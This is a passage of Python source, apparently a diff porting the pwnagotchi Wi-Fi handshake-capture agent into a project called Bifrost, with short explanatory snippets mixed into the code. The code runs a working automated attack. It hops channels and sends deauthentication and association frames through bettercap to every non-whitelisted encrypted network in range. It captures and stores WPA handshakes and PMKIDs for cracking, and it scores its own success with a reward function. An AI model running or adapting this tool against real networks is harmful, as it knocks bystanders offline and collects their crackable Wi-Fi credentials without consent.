except Exception:
pass
return False
# ── Recon cycle ───────────────────────────────────────
def recon(self):
"""Full-spectrum WiFi scan for recon_time seconds."""
recon_time = self._config.get('bifrost_personality_recon_time', 30)
max_inactive = 3
recon_mul = 2
if self.epoch.inactive_for >= max_inactive:
recon_time *= recon_mul
self._current_channel = 0
if not self._channels:
logger.debug("RECON %ds (all channels)", recon_time)
try:
self.bettercap.run('wifi.recon.channel clear')
except Exception:
pass
else:
ch_str = ','.join(map(str, self._channels))
logger.debug("RECON %ds on channels %s", recon_time, ch_str)
try:
self.bettercap.run('wifi.recon.channel %s' % ch_str)
except Exception as e:
logger.error("Error setting recon channels: %s", e)
self.automata.wait_for(recon_time, self.epoch, sleeping=False,
stop_event=self._stop_event)
def _filter_included(self, ap):
if self._filter is None:
return True
return (self._filter.match(ap.get('hostname', '')) is not None or
self._filter.match(ap.get('mac', '')) is not None)
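The filter above matches either the AP hostname or its MAC against a configured regex; the check in isolation:

```python
import re

def filter_included(ap, flt):
    """Return True when no filter is set or the AP matches it."""
    if flt is None:
        return True
    return (flt.match(ap.get('hostname', '')) is not None or
            flt.match(ap.get('mac', '')) is not None)

office_only = re.compile(r'^Office')
```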
def get_access_points(self):
"""Fetch APs from bettercap, filter whitelist and open networks."""
aps = []
try:
s = self.bettercap.session()
plugins.on("unfiltered_ap_list", s.get('wifi', {}).get('aps', []))
for ap in s.get('wifi', {}).get('aps', []):
enc = ap.get('encryption', '')
if enc == '' or enc == 'OPEN':
continue
hostname = ap.get('hostname', '').lower()
mac = ap.get('mac', '').lower()
prefix = mac[:8]
if (hostname not in self._whitelist and
mac not in self._whitelist and
prefix not in self._whitelist):
if self._filter_included(ap):
aps.append(ap)
except Exception as e:
logger.error("Error getting APs: %s", e)
aps.sort(key=lambda a: a.get('channel', 0))
self._access_points = aps
plugins.on('wifi_update', aps)
self.epoch.observe(aps, list(self.automata.peers.values()))
# Update DB with discovered networks
self._persist_networks(aps)
return aps
def get_access_points_by_channel(self):
"""Get APs grouped by channel, sorted by density."""
aps = self.get_access_points()
grouped = {}
for ap in aps:
ch = ap.get('channel', 0)
if self._channels and ch not in self._channels:
continue
grouped.setdefault(ch, []).append(ap)
return sorted(grouped.items(), key=lambda kv: len(kv[1]), reverse=True)
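The grouping step sorts channels by AP density so the busiest channels are visited first; a self-contained sketch of that logic:

```python
def group_by_channel(aps, allowed=None):
    """Group APs by channel, densest channel first; optionally restrict channels."""
    grouped = {}
    for ap in aps:
        ch = ap.get('channel', 0)
        if allowed and ch not in allowed:
            continue
        grouped.setdefault(ch, []).append(ap)
    return sorted(grouped.items(), key=lambda kv: len(kv[1]), reverse=True)
```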
# ── Actions ───────────────────────────────────────────
def _should_interact(self, who):
if self._has_handshake(who):
return False
if who not in self._history:
self._history[who] = 1
return True
self._history[who] += 1
max_int = self._config.get('bifrost_personality_max_interactions', 3)
return self._history[who] < max_int
def _has_handshake(self, bssid):
for key in self._handshakes:
if bssid.lower() in key:
return True
return False
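Together, `_should_interact` and `_has_handshake` cap how often a given AP or station is targeted per session; the counting logic in isolation:

```python
def should_interact(history, who, max_interactions=3):
    """Allow at most max_interactions attempts per MAC, tracked in `history`."""
    if who not in history:
        history[who] = 1  # first sighting always gets one attempt
        return True
    history[who] += 1
    return history[who] < max_interactions
```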
def associate(self, ap, throttle=0):
"""Send association frame to trigger PMKID."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_associate', True) and
self._should_interact(ap.get('mac', ''))):
try:
hostname = ap.get('hostname', ap.get('mac', '?'))
logger.info("ASSOC %s (%s) ch=%d rssi=%d",
hostname, ap.get('mac', ''), ap.get('channel', 0), ap.get('rssi', 0))
self.bettercap.run('wifi.assoc %s' % ap['mac'])
self.epoch.track(assoc=True)
self._log_activity('assoc', 'Association: %s' % hostname,
self.voice.on_assoc(hostname))
except Exception as e:
self.automata.on_error(ap.get('mac', ''), e)
plugins.on('association', ap)
if throttle > 0:
time.sleep(throttle)
def deauth(self, ap, sta, throttle=0):
"""Deauthenticate client to capture handshake."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_deauth', True) and
self._should_interact(sta.get('mac', ''))):
try:
logger.info("DEAUTH %s (%s) from %s ch=%d",
sta.get('mac', ''), sta.get('vendor', ''),
ap.get('hostname', ap.get('mac', '')), ap.get('channel', 0))
self.bettercap.run('wifi.deauth %s' % sta['mac'])
self.epoch.track(deauth=True)
self._log_activity('deauth', 'Deauth: %s' % sta.get('mac', ''),
self.voice.on_deauth(sta.get('mac', '')))
except Exception as e:
self.automata.on_error(sta.get('mac', ''), e)
plugins.on('deauthentication', ap, sta)
if throttle > 0:
time.sleep(throttle)
def set_channel(self, channel, verbose=True):
"""Hop to a specific WiFi channel."""
if self.automata.is_stale(self.epoch):
return
wait = 0
if self.epoch.did_deauth:
wait = self._config.get('bifrost_personality_hop_recon_time', 10)
elif self.epoch.did_associate:
wait = self._config.get('bifrost_personality_min_recon_time', 5)
if channel != self._current_channel:
if self._current_channel != 0 and wait > 0:
logger.debug("waiting %ds on channel %d", wait, self._current_channel)
self.automata.wait_for(wait, self.epoch, stop_event=self._stop_event)
try:
self.bettercap.run('wifi.recon.channel %d' % channel)
self._current_channel = channel
self.epoch.track(hop=True)
plugins.on('channel_hop', channel)
except Exception as e:
logger.error("Error setting channel: %s", e)
def next_epoch(self):
"""Transition to next epoch — evaluate mood."""
self.automata.next_epoch(self.epoch)
# Persist epoch to DB
data = self.epoch.data()
self._persist_epoch(data)
self._log_activity('epoch', 'Epoch %d' % (self.epoch.epoch - 1),
self.voice.on_epoch(self.epoch.epoch - 1))
# ── Event polling ─────────────────────────────────────
def start_event_polling(self):
"""Start event listener in background thread.
Tries websocket first; falls back to REST polling if the
``websockets`` package is not installed.
"""
t = threading.Thread(target=self._event_poller, daemon=True, name="BifrostEvents")
t.start()
def _event_poller(self):
try:
self.bettercap.run('events.clear')
except Exception:
pass
# Probe once whether websockets is available
try:
import websockets # noqa: F401
has_ws = True
except ImportError:
has_ws = False
logger.warning("websockets package not installed — using REST event polling "
"(pip install websockets for real-time events)")
if has_ws:
self._ws_event_loop()
else:
self._rest_event_loop()
def _ws_event_loop(self):
"""Websocket-based event listener (preferred)."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while not self._stop_event.is_set():
try:
loop.run_until_complete(self.bettercap.start_websocket(
self._on_event, self._stop_event))
except Exception as ex:
if self._stop_event.is_set():
break
logger.debug("Event poller error: %s", ex)
self._stop_event.wait(5)
loop.close()
def _rest_event_loop(self):
"""REST-based fallback event poller — polls /api/events every 2s."""
while not self._stop_event.is_set():
try:
events = self.bettercap.events()
for ev in (events or []):
tag = ev.get('tag', '')
if tag == 'wifi.client.handshake':
# Reuse the already-imported asyncio to run the async handler
asyncio.run(self._on_event(json.dumps(ev)))
except Exception as ex:
logger.debug("REST event poll error: %s", ex)
self._stop_event.wait(2)
async def _on_event(self, msg):
"""Handle bettercap websocket events."""
try:
jmsg = json.loads(msg)
except json.JSONDecodeError:
return
if jmsg.get('tag') == 'wifi.client.handshake':
filename = jmsg.get('data', {}).get('file', '')
sta_mac = jmsg.get('data', {}).get('station', '')
ap_mac = jmsg.get('data', {}).get('ap', '')
key = "%s -> %s" % (sta_mac, ap_mac)
if key not in self._handshakes:
self._handshakes[key] = jmsg
self._last_pwnd = ap_mac
# Find AP info
ap_name = ap_mac
try:
s = self.bettercap.session()
for ap in s.get('wifi', {}).get('aps', []):
if ap.get('mac') == ap_mac:
if ap.get('hostname') and ap['hostname'] != '<hidden>':
ap_name = ap['hostname']
break
except Exception:
pass
logger.warning("!!! HANDSHAKE: %s -> %s !!!", sta_mac, ap_name)
self.epoch.track(handshake=True)
self._persist_handshake(ap_mac, sta_mac, ap_name, filename)
self._log_activity('handshake',
'Handshake: %s' % ap_name,
self.voice.on_handshakes(1))
plugins.on('handshake', filename, ap_mac, sta_mac)
def start_session_fetcher(self):
"""Start background thread that polls bettercap for stats."""
t = threading.Thread(target=self._fetch_stats, daemon=True, name="BifrostStats")
t.start()
def _fetch_stats(self):
while not self._stop_event.is_set():
try:
s = self.bettercap.session()
self._tot_aps = len(s.get('wifi', {}).get('aps', []))
except Exception:
pass
self._stop_event.wait(2)
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return current agent state for the web API."""
return {
'mood': self.automata.mood,
'face': self.automata.face,
'voice': self.automata.voice_text,
'channel': self._current_channel,
'num_aps': self._tot_aps,
'num_handshakes': len(self._handshakes),
'uptime': int(time.time() - self._started_at),
'epoch': self.epoch.epoch,
'mode': self.mode,
'last_pwnd': self._last_pwnd or '',
'reward': self.epoch.data().get('reward', 0),
}
# ── DB persistence ────────────────────────────────────
def _persist_networks(self, aps):
"""Upsert discovered networks to DB."""
for ap in aps:
try:
self.db.execute(
"""INSERT INTO bifrost_networks
(bssid, essid, channel, encryption, rssi, vendor, num_clients, last_seen)
VALUES (?, ?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
ON CONFLICT(bssid) DO UPDATE SET
essid=?, channel=?, encryption=?, rssi=?, vendor=?,
num_clients=?, last_seen=CURRENT_TIMESTAMP""",
(ap.get('mac', ''), ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])),
ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])))
)
except Exception as e:
logger.debug("Error persisting network: %s", e)
def _persist_handshake(self, ap_mac, sta_mac, ap_name, filename):
try:
self.db.execute(
"""INSERT OR IGNORE INTO bifrost_handshakes
(ap_mac, sta_mac, ap_essid, filename)
VALUES (?, ?, ?, ?)""",
(ap_mac, sta_mac, ap_name, filename)
)
except Exception as e:
logger.debug("Error persisting handshake: %s", e)
def _persist_epoch(self, data):
try:
self.db.execute(
"""INSERT INTO bifrost_epochs
(epoch_num, started_at, duration_secs, num_deauths, num_assocs,
num_handshakes, num_hops, num_missed, num_peers, mood, reward,
cpu_load, mem_usage, temperature, meta_json)
VALUES (?, datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
(self.epoch.epoch - 1, data.get('duration_secs', 0),
data.get('num_deauths', 0), data.get('num_associations', 0),
data.get('num_handshakes', 0), data.get('num_hops', 0),
data.get('missed_interactions', 0), data.get('num_peers', 0),
self.automata.mood, data.get('reward', 0),
data.get('cpu_load', 0), data.get('mem_usage', 0),
data.get('temperature', 0), '{}')
)
except Exception as e:
logger.debug("Error persisting epoch: %s", e)
def _log_activity(self, event_type, title, details=''):
"""Log an activity event to the DB."""
self.automata.voice_text = details or title
try:
self.db.execute(
"""INSERT INTO bifrost_activity (event_type, title, details)
VALUES (?, ?, ?)""",
(event_type, title, details)
)
except Exception as e:
logger.debug("Error logging activity: %s", e)
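The handshake handler above de-duplicates on the `station -> ap` MAC pair before persisting. A minimal standalone sketch of that parsing path (the field names mirror what `_on_event` reads; the MAC addresses and file path are invented for illustration):

```python
import json

# Simulated bettercap 'wifi.client.handshake' event payload.
# Field names match what _on_event expects; values are illustrative only.
raw = json.dumps({
    'tag': 'wifi.client.handshake',
    'data': {
        'file': '/root/bifrost/handshakes/demo.pcap',
        'station': 'AA:BB:CC:DD:EE:FF',
        'ap': '11:22:33:44:55:66',
    },
})

jmsg = json.loads(raw)
key = ''
if jmsg.get('tag') == 'wifi.client.handshake':
    sta_mac = jmsg.get('data', {}).get('station', '')
    ap_mac = jmsg.get('data', {}).get('ap', '')
    key = "%s -> %s" % (sta_mac, ap_mac)

print(key)
```

The same key format is what gates the `self._handshakes` dict, so a repeated capture for the same client/AP pair is logged only once.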

bifrost/automata.py Normal file

@@ -0,0 +1,168 @@
"""
Bifrost — Mood state machine.
Ported from pwnagotchi/automata.py.
"""
import logging
from bifrost import plugins as plugins
from bifrost.faces import MOOD_FACES
from logger import Logger
logger = Logger(name="bifrost.automata", level=logging.DEBUG)
class BifrostAutomata:
"""Evaluates epoch data and transitions between moods."""
def __init__(self, config):
self._config = config
self.mood = 'starting'
self.face = MOOD_FACES.get('starting', '(. .)')
self.voice_text = ''
self._peers = {} # peer_id -> peer_data
@property
def peers(self):
return self._peers
def _set_mood(self, mood):
self.mood = mood
self.face = MOOD_FACES.get(mood, '(. .)')
def set_starting(self):
self._set_mood('starting')
def set_ready(self):
self._set_mood('ready')
plugins.on('ready')
def _has_support_network_for(self, factor):
bond_factor = self._config.get('bifrost_personality_bond_factor', 20000)
total_encounters = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in self._peers.values()
)
        support_factor = (total_encounters / bond_factor) if bond_factor else 0.0
return support_factor >= factor
def in_good_mood(self):
return self._has_support_network_for(1.0)
def set_grateful(self):
self._set_mood('grateful')
plugins.on('grateful')
def set_lonely(self):
if not self._has_support_network_for(1.0):
logger.info("unit is lonely")
self._set_mood('lonely')
plugins.on('lonely')
else:
logger.info("unit is grateful instead of lonely")
self.set_grateful()
def set_bored(self, inactive_for):
bored_epochs = self._config.get('bifrost_personality_bored_epochs', 15)
factor = inactive_for / bored_epochs if bored_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> bored", inactive_for)
self._set_mood('bored')
plugins.on('bored')
else:
logger.info("unit is grateful instead of bored")
self.set_grateful()
def set_sad(self, inactive_for):
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = inactive_for / sad_epochs if sad_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> sad", inactive_for)
self._set_mood('sad')
plugins.on('sad')
else:
logger.info("unit is grateful instead of sad")
self.set_grateful()
def set_angry(self, factor):
if not self._has_support_network_for(factor):
logger.warning("too many misses -> angry (factor=%.1f)", factor)
self._set_mood('angry')
plugins.on('angry')
else:
logger.info("unit is grateful instead of angry")
self.set_grateful()
def set_excited(self):
logger.warning("lots of activity -> excited")
self._set_mood('excited')
plugins.on('excited')
def set_rebooting(self):
self._set_mood('broken')
plugins.on('rebooting')
def next_epoch(self, epoch):
"""Evaluate epoch state and transition mood.
Args:
epoch: BifrostEpoch instance
"""
was_stale = epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
did_miss = epoch.num_missed
# Trigger epoch transition (resets counters, computes reward)
epoch.next()
max_misses = self._config.get('bifrost_personality_max_misses', 8)
excited_threshold = self._config.get('bifrost_personality_excited_epochs', 10)
# Mood evaluation (same logic as pwnagotchi automata.py)
if was_stale:
factor = did_miss / max_misses if max_misses else 1
if factor >= 2.0:
self.set_angry(factor)
else:
logger.warning("agent missed %d interactions -> lonely", did_miss)
self.set_lonely()
elif epoch.sad_for:
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = epoch.inactive_for / sad_epochs if sad_epochs else 1
if factor >= 2.0:
self.set_angry(factor)
else:
self.set_sad(epoch.inactive_for)
elif epoch.bored_for:
self.set_bored(epoch.inactive_for)
elif epoch.active_for >= excited_threshold:
self.set_excited()
elif epoch.active_for >= 5 and self._has_support_network_for(5.0):
self.set_grateful()
plugins.on('epoch', epoch.epoch - 1, epoch.data())
def on_miss(self, who):
logger.info("it looks like %s is not in range anymore :/", who)
def on_error(self, who, e):
if 'is an unknown BSSID' in str(e):
self.on_miss(who)
else:
logger.error(str(e))
def is_stale(self, epoch):
return epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
def wait_for(self, t, epoch, sleeping=True, stop_event=None):
"""Wait and track sleep time.
If *stop_event* is provided the wait is interruptible so the
engine can shut down quickly even during long recon windows.
"""
plugins.on('sleep' if sleeping else 'wait', t)
epoch.track(sleep=True, inc=t)
import time
if stop_event is not None:
stop_event.wait(t)
else:
time.sleep(t)
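Condensed, the mood selection in `next_epoch` reduces to a small decision table. A simplified, self-contained sketch of that ordering (defaults match the config lookups above; the grateful/support-network branch is omitted for brevity, so this is an approximation, not the full logic):

```python
def pick_mood(missed, active, sad_for, bored_for,
              max_misses=8, excited_epochs=10):
    # Order matters: staleness wins over sadness, sadness over boredom,
    # and only a sustained activity streak triggers excitement.
    if missed > max_misses:
        return 'angry' if (missed / max_misses) >= 2.0 else 'lonely'
    if sad_for:
        return 'sad'
    if bored_for:
        return 'bored'
    if active >= excited_epochs:
        return 'excited'
    return 'ready'
```

For example, 20 misses against the default threshold of 8 gives a factor of 2.5 and lands on `angry`, while a 12-epoch activity streak with no misses lands on `excited`.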

bifrost/bettercap.py Normal file

@@ -0,0 +1,103 @@
"""
Bifrost — Bettercap REST API client.
Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
"""
import json
import logging
import base64
import urllib.request
import urllib.error
from logger import Logger
logger = Logger(name="bifrost.bettercap", level=logging.DEBUG)
class BettercapClient:
"""Synchronous REST client for the bettercap API."""
def __init__(self, hostname='127.0.0.1', scheme='http', port=8081,
username='user', password='pass'):
self.hostname = hostname
self.scheme = scheme
self.port = port
self.username = username
self.password = password
self.url = "%s://%s:%d/api" % (scheme, hostname, port)
self.websocket = "ws://%s:%s@%s:%d/api" % (username, password, hostname, port)
self._auth_header = 'Basic ' + base64.b64encode(
('%s:%s' % (username, password)).encode()
).decode()
def _request(self, method, path, data=None, verbose_errors=True):
"""Make an HTTP request to bettercap API."""
url = "%s%s" % (self.url, path)
body = json.dumps(data).encode() if data else None
req = urllib.request.Request(url, data=body, method=method)
req.add_header('Authorization', self._auth_header)
if body:
req.add_header('Content-Type', 'application/json')
try:
with urllib.request.urlopen(req, timeout=10) as resp:
raw = resp.read().decode('utf-8')
try:
return json.loads(raw)
except json.JSONDecodeError:
return raw
except urllib.error.HTTPError as e:
err = "error %d: %s" % (e.code, e.read().decode('utf-8', errors='replace').strip())
if verbose_errors:
logger.info(err)
raise Exception(err)
except urllib.error.URLError as e:
raise Exception("bettercap unreachable: %s" % e.reason)
def session(self):
"""GET /api/session — current bettercap state."""
return self._request('GET', '/session')
def run(self, command, verbose_errors=True):
"""POST /api/session — execute a bettercap command."""
return self._request('POST', '/session', {'cmd': command},
verbose_errors=verbose_errors)
def events(self):
"""GET /api/events — poll recent events (REST fallback)."""
try:
result = self._request('GET', '/events', verbose_errors=False)
# Clear after reading so we don't reprocess
try:
self.run('events.clear', verbose_errors=False)
except Exception:
pass
return result if isinstance(result, list) else []
except Exception:
return []
async def start_websocket(self, consumer, stop_event=None):
"""Connect to bettercap websocket event stream.
Args:
consumer: async callable that receives each message string.
stop_event: optional threading.Event — exit when set.
"""
import websockets
import asyncio
ws_url = "%s/events" % self.websocket
while not (stop_event and stop_event.is_set()):
try:
async with websockets.connect(ws_url, ping_interval=60,
ping_timeout=90) as ws:
async for msg in ws:
if stop_event and stop_event.is_set():
return
try:
await consumer(msg)
except Exception as ex:
logger.debug("Error parsing event: %s", ex)
except Exception as ex:
if stop_event and stop_event.is_set():
return
logger.debug("Websocket error: %s — reconnecting...", ex)
await asyncio.sleep(2)
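The client authenticates every request with a pre-computed HTTP Basic auth header. The encoding step in isolation (credentials here are the `__init__` defaults, not real ones):

```python
import base64

username, password = 'user', 'pass'
# Same construction as BettercapClient._auth_header above.
auth_header = 'Basic ' + base64.b64encode(
    ('%s:%s' % (username, password)).encode()
).decode()
print(auth_header)  # → Basic dXNlcjpwYXNz
```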

bifrost/compat.py Normal file

@@ -0,0 +1,185 @@
"""
Bifrost — Pwnagotchi compatibility shim.
Registers `pwnagotchi` in sys.modules so existing plugins can
`import pwnagotchi` and get Bifrost-backed implementations.
"""
import sys
import time
import types
import os
def install_shim(shared_data, bifrost_plugins_module):
"""Install the pwnagotchi namespace shim into sys.modules.
Call this BEFORE loading any pwnagotchi plugins so their
`import pwnagotchi` resolves to our shim.
"""
_start_time = time.time()
# Create the fake pwnagotchi module
pwn = types.ModuleType('pwnagotchi')
pwn.__version__ = '2.0.0-bifrost'
pwn.__file__ = __file__
pwn.config = _build_compat_config(shared_data)
def _name():
return shared_data.config.get('bjorn_name', 'bifrost')
def _set_name(n):
pass # no-op, name comes from Bjorn config
def _uptime():
return time.time() - _start_time
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0
def _reboot():
pass # no-op in Bifrost — we don't auto-reboot
pwn.name = _name
pwn.set_name = _set_name
pwn.uptime = _uptime
pwn.cpu_load = _cpu_load
pwn.mem_usage = _mem_usage
pwn.temperature = _temperature
pwn.reboot = _reboot
# Register modules
sys.modules['pwnagotchi'] = pwn
sys.modules['pwnagotchi.plugins'] = bifrost_plugins_module
sys.modules['pwnagotchi.utils'] = _build_utils_shim(shared_data)
def _build_compat_config(shared_data):
"""Translate Bjorn's flat bifrost_* config to pwnagotchi's nested format."""
cfg = shared_data.config
return {
'main': {
'name': cfg.get('bjorn_name', 'bifrost'),
'iface': cfg.get('bifrost_iface', 'wlan0mon'),
'mon_start_cmd': '',
'no_restart': False,
'filter': cfg.get('bifrost_filter', ''),
'whitelist': [
w.strip() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
],
'plugins': cfg.get('bifrost_plugins', {}),
'custom_plugins': cfg.get('bifrost_plugins_path', ''),
'mon_max_blind_epochs': 50,
},
'personality': {
'ap_ttl': cfg.get('bifrost_personality_ap_ttl', 120),
'sta_ttl': cfg.get('bifrost_personality_sta_ttl', 300),
'min_rssi': cfg.get('bifrost_personality_min_rssi', -200),
'associate': cfg.get('bifrost_personality_associate', True),
'deauth': cfg.get('bifrost_personality_deauth', True),
'recon_time': cfg.get('bifrost_personality_recon_time', 30),
'hop_recon_time': cfg.get('bifrost_personality_hop_recon_time', 10),
'min_recon_time': cfg.get('bifrost_personality_min_recon_time', 5),
'max_inactive_scale': 3,
'recon_inactive_multiplier': 2,
'max_interactions': cfg.get('bifrost_personality_max_interactions', 3),
'max_misses_for_recon': cfg.get('bifrost_personality_max_misses', 8),
'excited_num_epochs': cfg.get('bifrost_personality_excited_epochs', 10),
'bored_num_epochs': cfg.get('bifrost_personality_bored_epochs', 15),
'sad_num_epochs': cfg.get('bifrost_personality_sad_epochs', 25),
'bond_encounters_factor': cfg.get('bifrost_personality_bond_factor', 20000),
'channels': [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
],
},
'bettercap': {
'hostname': cfg.get('bifrost_bettercap_host', '127.0.0.1'),
'scheme': 'http',
'port': cfg.get('bifrost_bettercap_port', 8081),
'username': cfg.get('bifrost_bettercap_user', 'user'),
'password': cfg.get('bifrost_bettercap_pass', 'pass'),
'handshakes': cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes'),
'silence': [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
],
},
'ai': {
'enabled': cfg.get('bifrost_ai_enabled', False),
'path': '/root/bifrost/brain.json',
},
'ui': {
'fps': 1.0,
'web': {'enabled': False},
'display': {'enabled': False},
},
}
def _build_utils_shim(shared_data):
"""Minimal pwnagotchi.utils shim."""
mod = types.ModuleType('pwnagotchi.utils')
def secs_to_hhmmss(secs):
h = int(secs // 3600)
m = int((secs % 3600) // 60)
s = int(secs % 60)
return "%d:%02d:%02d" % (h, m, s)
def iface_channels(iface):
"""Return available channels for interface."""
try:
import subprocess
out = subprocess.check_output(
['iwlist', iface, 'channel'],
stderr=subprocess.DEVNULL, timeout=5
).decode()
channels = []
for line in out.split('\n'):
if 'Channel' in line and 'Current' not in line:
parts = line.strip().split()
for p in parts:
try:
ch = int(p)
if 1 <= ch <= 14:
channels.append(ch)
except ValueError:
continue
return sorted(set(channels)) if channels else list(range(1, 15))
except Exception:
return list(range(1, 15))
def total_unique_handshakes(path):
"""Count unique handshake files in directory."""
import glob as _glob
if not os.path.isdir(path):
return 0
return len(_glob.glob(os.path.join(path, '*.pcap')))
mod.secs_to_hhmmss = secs_to_hhmmss
mod.iface_channels = iface_channels
mod.total_unique_handshakes = total_unique_handshakes
return mod
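The `secs_to_hhmmss` shim is simple enough to verify by hand; reproduced standalone for a quick sanity check:

```python
def secs_to_hhmmss(secs):
    # Same arithmetic as the shim above: whole hours, then minutes, then seconds.
    h = int(secs // 3600)
    m = int((secs % 3600) // 60)
    s = int(secs % 60)
    return "%d:%02d:%02d" % (h, m, s)

print(secs_to_hhmmss(3725))  # → 1:02:05
```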

bifrost/epoch.py Normal file

@@ -0,0 +1,292 @@
"""
Bifrost — Epoch tracking.
Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
"""
import time
import threading
import logging
import os
from logger import Logger
logger = Logger(name="bifrost.epoch", level=logging.DEBUG)
NUM_CHANNELS = 14 # 2.4 GHz channels
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────
class RewardFunction:
"""Reward signal for RL — higher is better."""
def __call__(self, epoch_n, state):
eps = 1e-20
tot_epochs = epoch_n + eps
tot_interactions = max(
state['num_deauths'] + state['num_associations'],
state['num_handshakes']
) + eps
tot_channels = NUM_CHANNELS
# Positive signals
h = state['num_handshakes'] / tot_interactions
a = 0.2 * (state['active_for_epochs'] / tot_epochs)
c = 0.1 * (state['num_hops'] / tot_channels)
# Negative signals
b = -0.3 * (state['blind_for_epochs'] / tot_epochs)
m = -0.3 * (state['missed_interactions'] / tot_interactions)
i = -0.2 * (state['inactive_for_epochs'] / tot_epochs)
_sad = state['sad_for_epochs'] if state['sad_for_epochs'] >= 5 else 0
_bored = state['bored_for_epochs'] if state['bored_for_epochs'] >= 5 else 0
s = -0.2 * (_sad / tot_epochs)
l_val = -0.1 * (_bored / tot_epochs)
return h + a + c + b + i + m + s + l_val
# ── Epoch state ──────────────────────────────────────────────────
class BifrostEpoch:
"""Tracks per-epoch counters, observations, and reward."""
def __init__(self, config):
self.epoch = 0
self.config = config
# Consecutive epoch counters
self.inactive_for = 0
self.active_for = 0
self.blind_for = 0
self.sad_for = 0
self.bored_for = 0
# Per-epoch action flags & counters
self.did_deauth = False
self.num_deauths = 0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.any_activity = False
# Timing
self.epoch_started = time.time()
self.epoch_duration = 0
# Channel histograms for AI observation
self.non_overlapping_channels = {1: 0, 6: 0, 11: 0}
self._observation = {
'aps_histogram': [0.0] * NUM_CHANNELS,
'sta_histogram': [0.0] * NUM_CHANNELS,
'peers_histogram': [0.0] * NUM_CHANNELS,
}
self._observation_ready = threading.Event()
self._epoch_data = {}
self._epoch_data_ready = threading.Event()
self._reward = RewardFunction()
def wait_for_epoch_data(self, with_observation=True, timeout=None):
self._epoch_data_ready.wait(timeout)
self._epoch_data_ready.clear()
if with_observation:
return {**self._observation, **self._epoch_data}
return self._epoch_data
def data(self):
return self._epoch_data
def observe(self, aps, peers):
"""Update observation histograms from current AP/peer lists."""
num_aps = len(aps)
if num_aps == 0:
self.blind_for += 1
else:
self.blind_for = 0
bond_unit_scale = self.config.get('bifrost_personality_bond_factor', 20000)
self.num_peers = len(peers)
num_peers = self.num_peers + 1e-10
self.tot_bond_factor = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in peers
) / bond_unit_scale
self.avg_bond_factor = self.tot_bond_factor / num_peers
num_aps_f = len(aps) + 1e-10
num_sta = sum(len(ap.get('clients', [])) for ap in aps) + 1e-10
aps_per_chan = [0.0] * NUM_CHANNELS
sta_per_chan = [0.0] * NUM_CHANNELS
peers_per_chan = [0.0] * NUM_CHANNELS
for ap in aps:
ch_idx = ap.get('channel', 1) - 1
if 0 <= ch_idx < NUM_CHANNELS:
aps_per_chan[ch_idx] += 1.0
sta_per_chan[ch_idx] += len(ap.get('clients', []))
for peer in peers:
ch = peer.get('last_channel', 0) if isinstance(peer, dict) else getattr(peer, 'last_channel', 0)
ch_idx = ch - 1
if 0 <= ch_idx < NUM_CHANNELS:
peers_per_chan[ch_idx] += 1.0
# Normalize
aps_per_chan = [e / num_aps_f for e in aps_per_chan]
sta_per_chan = [e / num_sta for e in sta_per_chan]
peers_per_chan = [e / num_peers for e in peers_per_chan]
self._observation = {
'aps_histogram': aps_per_chan,
'sta_histogram': sta_per_chan,
'peers_histogram': peers_per_chan,
}
self._observation_ready.set()
def track(self, deauth=False, assoc=False, handshake=False,
hop=False, sleep=False, miss=False, inc=1):
"""Increment epoch counters."""
if deauth:
self.num_deauths += inc
self.did_deauth = True
self.any_activity = True
if assoc:
self.num_assocs += inc
self.did_associate = True
self.any_activity = True
if miss:
self.num_missed += inc
if hop:
self.num_hops += inc
# Reset per-channel flags on hop
self.did_deauth = False
self.did_associate = False
if handshake:
self.num_shakes += inc
self.did_handshakes = True
if sleep:
self.num_slept += inc
def next(self):
"""Transition to next epoch — compute reward, update streaks, reset counters."""
# Update activity streaks
if not self.any_activity and not self.did_handshakes:
self.inactive_for += 1
self.active_for = 0
else:
self.active_for += 1
self.inactive_for = 0
self.sad_for = 0
self.bored_for = 0
sad_threshold = self.config.get('bifrost_personality_sad_epochs', 25)
bored_threshold = self.config.get('bifrost_personality_bored_epochs', 15)
if self.inactive_for >= sad_threshold:
self.bored_for = 0
self.sad_for += 1
elif self.inactive_for >= bored_threshold:
self.sad_for = 0
self.bored_for += 1
else:
self.sad_for = 0
